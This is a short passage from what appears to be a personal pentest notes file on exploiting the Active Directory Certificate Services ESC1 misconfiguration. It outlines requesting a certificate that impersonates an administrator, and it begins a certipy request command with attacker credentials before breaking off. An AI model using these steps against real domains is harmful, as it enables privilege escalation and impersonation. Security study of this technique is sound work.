0xPix3l/obsidian/Windows/Active directory/Attacks/ADCS/ESC1.md

 Exploiting an ESC1 vulnerability typically involves two main steps:
 1. Requesting a certificate using the vulnerable template, injecting the identity of a privileged target(administrator).
-2. Using the obtained certificate to authenticate as that target.

 ```bash
 certipy req \
     -u 'attacker@corp.local' -p 'Passw0rd!' \